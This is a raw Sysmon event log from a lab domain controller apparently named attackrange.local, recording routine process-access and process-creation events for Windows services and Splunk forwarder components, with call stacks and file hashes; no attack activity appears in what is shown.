16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8501-6019-5105-00000000A301}5912C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179831Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179830Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179829Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179828Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179827Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179826Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179825Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179824Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179856Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:34.891{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D3E2-601A-2930-00000000A301}6676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179855Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:34.891{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179854Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:34.891{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179853Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:34.891{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179852Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:34.891{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179851Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:34.891{29E67E80-7CBD-6019-0500-00000000A301}6402196C:\Windows\system32\csrss.exe{29E67E80-D3E2-601A-2930-00000000A301}6676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000179850Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:34.891{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D3E2-601A-2930-00000000A301}6676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000179849Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:34.891{29E67E80-D3E2-601A-2930-00000000A301}6676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000179865Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:35.703{29E67E80-D3E3-601A-2A30-00000000A301}12405972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179864Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:35.563{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D3E3-601A-2A30-00000000A301}1240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179863Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:35.563{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179862Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:35.563{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179861Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:35.563{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179860Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:35.563{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179859Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:35.563{29E67E80-7CBD-6019-0500-00000000A301}6402192C:\Windows\system32\csrss.exe{29E67E80-D3E3-601A-2A30-00000000A301}1240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000179858Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:35.563{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D3E3-601A-2A30-00000000A301}1240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000179857Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:35.563{29E67E80-D3E3-601A-2A30-00000000A301}1240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000179882Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:36.906{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D3E4-601A-2C30-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179881Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:36.906{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179880Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:36.906{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179879Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 